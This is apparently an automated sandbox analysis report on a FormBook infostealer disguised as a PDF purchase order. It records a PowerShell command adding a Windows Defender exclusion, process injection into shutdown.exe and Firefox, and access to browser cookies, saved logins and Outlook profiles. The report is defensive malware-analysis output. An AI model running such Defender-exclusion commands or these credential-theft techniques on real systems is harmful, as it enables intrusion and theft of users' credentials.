                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011325E0 mov eax, dword ptr fs:[00000030h]4_2_011325E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C5ED mov eax, dword ptr fs:[00000030h]4_2_0116C5ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C5ED mov eax, dword ptr fs:[00000030h]4_2_0116C5ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168402 mov eax, dword ptr fs:[00000030h]4_2_01168402
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168402 mov eax, dword ptr fs:[00000030h]4_2_01168402
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168402 mov eax, dword ptr fs:[00000030h]4_2_01168402
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A430 mov eax, dword ptr fs:[00000030h]4_2_0116A430
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E420 mov eax, dword ptr fs:[00000030h]4_2_0112E420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E420 mov eax, dword ptr fs:[00000030h]4_2_0112E420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E420 mov eax, dword ptr fs:[00000030h]4_2_0112E420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112C427 mov eax, dword ptr fs:[00000030h]4_2_0112C427
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6420 mov eax, dword ptr fs:[00000030h]4_2_011B6420
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EA456 mov eax, dword ptr fs:[00000030h]4_2_011EA456
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112645D mov eax, dword ptr fs:[00000030h]4_2_0112645D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115245A mov eax, dword ptr fs:[00000030h]4_2_0115245A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E443 mov eax, dword ptr fs:[00000030h]4_2_0116E443
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115A470 mov eax, dword ptr fs:[00000030h]4_2_0115A470
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115A470 mov eax, dword ptr fs:[00000030h]4_2_0115A470
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115A470 mov eax, dword ptr fs:[00000030h]4_2_0115A470
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BC460 mov ecx, dword ptr fs:[00000030h]4_2_011BC460
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Memory written: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Section loaded: NULL target: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\shutdown.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe protection: read write
                Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\shutdown.exe Thread register set: target process: 5748
                Source: C:\Windows\SysWOW64\shutdown.exe Thread APC queued: target process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Process created: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
                Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Queries volume information: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe VolumeInformation
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\shutdown.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match File source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 14 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1552610, Sample: New PO [FK4-7173].pdf.exe, Startdate: 09/11/2024, Architecture: WINDOWS, Score: 100
                Sample signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected FormBook; 11 other signatures
                DNS/IP: www.maviro.xyz (Performs DNS queries to domains with low reputation), www.winspinoffr.pro, 21 other IPs or domains
                New PO [FK4-7173].pdf.exe: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes; dropped C:\Users\...\New PO [FK4-7173].pdf.exe.log (ASCII); started New PO [FK4-7173].pdf.exe and powershell.exe
